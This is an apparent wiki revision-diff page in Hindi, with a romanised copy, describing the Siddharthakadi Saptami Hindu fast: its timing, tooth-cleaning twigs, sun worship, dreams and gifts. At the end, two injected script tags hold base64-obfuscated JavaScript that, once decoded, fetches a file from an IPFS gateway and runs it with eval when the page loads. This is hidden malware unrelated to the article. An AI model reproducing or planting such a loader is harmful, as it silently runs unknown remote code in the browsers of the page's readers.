Difference between revisions of "सिद्धार्थकादि सप्तमी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "ref>(" to "ref>")
 
(One intermediate revision by one other user not shown)
Line 1: Line 1:
 
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
 
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
*यह व्रत [[माघ]] या [[मार्गशीर्ष]] [[शुक्ल पक्ष]] [[सपतमी]] पर होता है।
+
*यह व्रत [[माघ]] या [[मार्गशीर्ष]] [[शुक्ल पक्ष]] [[सप्तमी]] पर होता है।
 
*यदि अस्वस्थता हो तो किसी भी [[मास]] की सप्तमी पर करना चाहिए।
 
*यदि अस्वस्थता हो तो किसी भी [[मास]] की सप्तमी पर करना चाहिए।
 
*सूर्योदय के पूर्व आधे प्रहर (लगभग चार घटिकाओं) तक दाँतों को विशिष्ट वृक्षों की टहनियों से स्वच्छ किया जाता है।
 
*सूर्योदय के पूर्व आधे प्रहर (लगभग चार घटिकाओं) तक दाँतों को विशिष्ट वृक्षों की टहनियों से स्वच्छ किया जाता है।
Line 9: Line 9:
 
*जप, होम, [[सूर्य देवता|सूर्य]] की पूजा करना चाहिए।
 
*जप, होम, [[सूर्य देवता|सूर्य]] की पूजा करना चाहिए।
 
*सूर्य प्रतिमा के समक्ष सोना चाहिए।
 
*सूर्य प्रतिमा के समक्ष सोना चाहिए।
*[[गायत्री मंत्र]] का पाठ<ref>ऋग्वेद 3|62|10)</ref>करना चाहिए।  
+
*[[गायत्री मंत्र]] का पाठ<ref>ऋग्वेद 3|62|10</ref>करना चाहिए।  
 
*सूर्य प्रतिमा के समक्ष सोते समय आये हुए स्वप्नों का निरूपण करना चाहिए।   
 
*सूर्य प्रतिमा के समक्ष सोते समय आये हुए स्वप्नों का निरूपण करना चाहिए।   
 
*विभिन्न [[भारत के पुष्प|पुष्पों]] से सूर्य पूजा करने से विभिन्न लाभ मिलते हैं। यथा–कमलों से यश, मन्दार से कुष्ठ हरण, अगत्स्य से सफलता आदि।  
 
*विभिन्न [[भारत के पुष्प|पुष्पों]] से सूर्य पूजा करने से विभिन्न लाभ मिलते हैं। यथा–कमलों से यश, मन्दार से कुष्ठ हरण, अगत्स्य से सफलता आदि।  
*ब्रह्मभोज एवं रंगीन वस्त्रों, सुगन्धों, पुष्पों, हविष्य भोजन, एक गाय का दान करना चाहिए।<ref>कृत्यकल्पतरु (व्रतखण्ड 172-180); हेमाद्रि (व्रतखण्ड 1, 679-684, भविष्यपुराण 1|193|2-21 से उद्धरण); कृत्यकल्पतरु (व्रतखण्ड) ने [[भविष्यपुराण]] (197|1-10 से उद्धरण)</ref>  
+
*ब्रह्मभोज एवं रंगीन वस्त्रों, सुगन्धों, पुष्पों, हविष्य भोजन, एक गाय का दान करना चाहिए।<ref>कृत्यकल्पतरु (व्रतखण्ड 172-180); हेमाद्रि (व्रतखण्ड 1, 679-684, भविष्यपुराण 1|193|2-21 से उद्धरण); कृत्यकल्पतरु (व्रतखण्ड) ने [[भविष्यपुराण]] (197|1-10 से उद्धरण</ref>  
 
 
 
 
 
{{संदर्भ ग्रंथ}}
 
{{संदर्भ ग्रंथ}}

Latest revision as of 05:59, 29 August 2012

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • yah vrat magh ya margashirsh shukl paksh saptami par hota hai.
  • yadi asvasthata ho to kisi bhi mas ki saptami par karana chahie.
  • sooryoday ke poorv adhe prahar (lagabhag char ghatikaoan) tak daantoan ko vishisht vrikshoan ki tahaniyoan se svachchh kiya jata hai.
  • jinamean pratyek kisi kamana ki poorti ke yogy mani jati haian.
  • madhook se putr prapt hote haian, arjun se saubhagy sthir hota hai, nimb se samriddhi prapt hoti hai, ashvatth se yash milata hai.
  • jab datun pheank di jati hai to usake girane ke dhang se shakun nikale jate haian.
  • sat saptamiyaan manayi jati haian, pahali sarasoan se, doosari ark ki kaliyoan se, tisari se satavian saptami kram se marich, nimb, 6 phaloan, bhojan (bhat nahian) se manayi jati haian.
  • jap, hom, soory ki pooja karana chahie.
  • soory pratima ke samaksh sona chahie.
  • gayatri mantr ka path[1]karana chahie.
  • soory pratima ke samaksh sote samay aye hue svapnoan ka niroopan karana chahie.
  • vibhinn pushpoan se soory pooja karane se vibhinn labh milate haian. yatha–kamaloan se yash, mandar se kushth haran, agatsy se saphalata adi.
  • brahmabhoj evan rangin vastroan, sugandhoan, pushpoan, havishy bhojan, ek gay ka dan karana chahie.[2]

 

tika tippani aur sandarbh

  1. rrigved 3|62|10
  2. krityakalpataru (vratakhand 172-180); hemadri (vratakhand 1, 679-684, bhavishyapuran 1|193|2-21 se uddharan); krityakalpataru (vratakhand) ne bhavishyapuran (197|1-10 se uddharan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>